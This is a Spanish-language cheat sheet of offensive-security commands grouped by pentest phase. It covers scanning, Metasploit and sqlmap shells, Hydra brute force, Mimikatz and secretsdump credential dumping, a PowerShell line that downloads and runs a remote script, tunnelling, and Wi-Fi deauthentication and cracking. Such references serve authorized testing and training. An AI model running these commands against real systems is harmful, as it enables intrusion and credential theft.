referencia rápida

Comandos de referencia

Una pestaña completa con utilidades para reconocimiento, explotación, post-explotación, Wi-Fi, análisis forense y automatización. Cada bloque incluye casos de uso reales y ejemplos reproducibles.

fase 01

Reconocimiento & enumeración

Herramientas para mapear superficies de ataque, descubrir dominios, puertos, servicios y rutas internas.

nmap

Escaneo activo de puertos/servicios con scripts NSE.

  • Modo completo: nmap -sC -sV -A -oA cliente 10.10.0.0/24
  • Barrido rápido: nmap -F --top-ports 100 target

masscan

Escaneo TCP asincrónico a gran velocidad. Ideal para rangos enormes.

  • sudo masscan 0.0.0.0/0 -p1-65535 --rate 10000 -oJ hallazgos.json
  • Combínalo con nmap para profundizar en puertos abiertos.

rustscan

Wrapper de nmap escrito en Rust que detecta puertos en segundos.

  • rustscan -a 10.10.11.5 --ulimit 5000 -- -sC -sV

amass

Enumeración de subdominios mediante fuentes pasivas/activas.

  • amass enum -d empresa.com -o subdominios.txt
  • amass intel -whois -d empresa.com

subfinder + httpx

Pipeline rápido para descubrir subdominios y verificar servicios HTTP.

  • subfinder -d empresa.com -silent | httpx -silent -status-code

aquatone

Captura screenshots de superficies web encontradas.

  • cat hosts.txt | aquatone -ports 80,443,8080 -out recon/

enum4linux-ng

Enumeración SMB/NetBIOS en entornos Windows.

  • enum4linux-ng -A 10.10.10.0 -oA smb_recon

ldapsearch

Consulta directorios LDAP/AD para listar usuarios, grupos o políticas.

  • ldapsearch -x -H ldap://dc01 -D "user@dom.local" -w pass -b "dc=dom,dc=local"

fase 02

Explotación & acceso inicial

Utilidades para aprovechar vulnerabilidades y obtener shells controladas.

metasploit

Framework modular de exploits y payloads listos.

  • msfconsole -q -x "search vsftpd; use exploit/unix/ftp/vsftpd_234_backdoor"
  • set RHOSTS 10.10.10.5; set LHOST tun0; run

sqlmap

Automatiza SQLi desde detección hasta exfiltración.

  • sqlmap -r request.txt --risk=2 --level=3 --batch --dump
  • sqlmap -u "https://site/id=1" --os-shell

hydra

Fuerza bruta paralela contra múltiples protocolos.

  • hydra -L users.txt -P rockyou.txt ftp://10.10.10.8
  • hydra -l admin -P pass.txt http-post-form "/login:usr=^USER^&pwd=^PASS^:F=error"

crackmapexec

Swiss army knife para entornos Windows/AD.

  • cme smb 10.10.10.0/24 -u user -p pass --shares
  • cme smb target -u user -H NTLMHASH -x "whoami"

searchsploit

Consulta local de exploits en Exploit-DB.

  • searchsploit ProFTPD 1.3.5
  • searchsploit -x exploits/linux/remote/12345.txt para leer el PoC.

responder

Envenena LLMNR/NBNS para capturar hashes NTLM.

  • sudo responder -I eth0 -dwPv

fase 03

Post-explotación & movimiento lateral

Scripts y utilidades para escalar privilegios, pivotar y recolectar credenciales.

linpeas / winpeas

Enumeran configuraciones débiles en Linux/Windows.

  • wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
  • powershell -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://winpeas.ps1')"

mimikatz

Extracción de credenciales y tickets Kerberos (solo con permiso).

  • privilege::debug
  • sekurlsa::logonpasswords

bloodhound + sharphound

Mapean grafos de privilegios en AD.

  • Invoke-BloodHound -CollectionMethod All -ZipFile loot.zip

chisel / sshuttle

Túneles para pivotar a redes internas.

  • ./chisel server -p 8000 --reverse
  • sshuttle -r user@host 10.10.0.0/24

impacket toolkit

Scripts para SMB, Kerberos, DCOM, etc.

  • GetUserSPNs.py dominio/user:pass -request
  • psexec.py dom/user:pass@target cmd.exe

fase inalámbrica

Wi-Fi & radiofrecuencia

Automatiza auditorías de redes inalámbricas y captura handshakes.

airmon-ng / airodump-ng

Modo monitor y captura de handshakes WPA.

  • airmon-ng start wlan0
  • airodump-ng wlan0mon --bssid <AP> --channel 6 -w captura

aireplay-ng

Desautenticación para forzar handshakes.

  • aireplay-ng -0 10 -a <AP> -c <CLIENTE> wlan0mon

bettercap

Framework MITM multi-protocolo con módulos Wi-Fi.

  • sudo bettercap -iface wlan0
  • set wifi.recon on

hcxdumptool + hashcat

Captura PMKID/handshakes y crackea con GPU.

  • hcxdumptool -i wlan0mon -o handshakes.pcapng --enable_status=15
  • hashcat -m 22000 handshakes.hc22000 rockyou.txt

fase web

Web, APIs & fuzzing

Herramientas para interceptar, automatizar y fuzzear aplicaciones web.

Burp Suite / OWASP ZAP

Proxies interceptores con módulos de escaneo.

  • java -jar burpsuite_community.jar
  • zaproxy -daemon -config api.key=TOKEN

ffuf

Fuzzer ultrarrápido para directorios, subdominios y parámetros.

  • ffuf -w SecLists/Discovery/Web-Content/common.txt -u https://site/FUZZ
  • ffuf -u https://site/admin?user=FUZZ -w users.txt -X POST

nuclei

Motor de plantillas para detectar CVEs y malas configuraciones.

  • nuclei -t cves/ -u https://site
  • nuclei -l urls.txt -tags takeovers,misconfig

gobuster / dirsearch

Descubren rutas ocultas y virtual hosts.

  • gobuster vhost -u https://site -w subdomains.txt
  • dirsearch -u https://site -e php,txt,conf

postman + newman

Pruebas de APIs REST; ejecuta colecciones desde CLI.

  • newman run coleccion.json -e entorno.json

fase forense

Análisis forense & monitoreo

Revisión de tráfico, memoria y artefactos para responder incidentes.

tcpdump / tshark

Captura y filtrado CLI de paquetes.

  • sudo tcpdump -i eth0 -nn -w captura.pcap
  • tshark -r captura.pcap -Y "http.request"

wireshark

GUI poderosa para análisis profundo.

  • Filtro: tcp.stream eq 5
  • Exporta objetos HTTP para extraer archivos.

volatility3

Analiza volcados de memoria en sistemas Windows/Linux.

  • vol -f mem.raw windows.pslist
  • vol -f mem.raw windows.hashdump

sleuthkit / autopsy

Framework para analizar discos, timelines y artefactos.

  • fls -r -m / imagen.dd
  • autopsy para GUI.

fase 360

Automatización & scripting

Orquesta tus pruebas con scripts y pipelines reproducibles.

python3

Lenguaje versátil para PoCs, bots y clientes personalizados.

  • python3 -m venv env && source env/bin/activate
  • requests, scapy, pwntools.

bash scripting

Automatiza tareas repetitivas en Linux.

  • #!/bin/bash; for host in $(cat hosts); do nmap -sC -sV $host; done

ansible

Despliegue de laboratorios y herramientas.

  • ansible-playbook setup-lab.yml -i inventario

impacket-scripts

APIs Python para SMB/Kerberos, útiles en pipelines.

  • python3 secretsdump.py dom/user@host -hashes LMHASH:NTHASH

go / rust

Compila herramientas estáticas y portables.

  • GOOS=linux GOARCH=amd64 go build cmd.go
  • Perfecto para implantar binarios sin dependencias.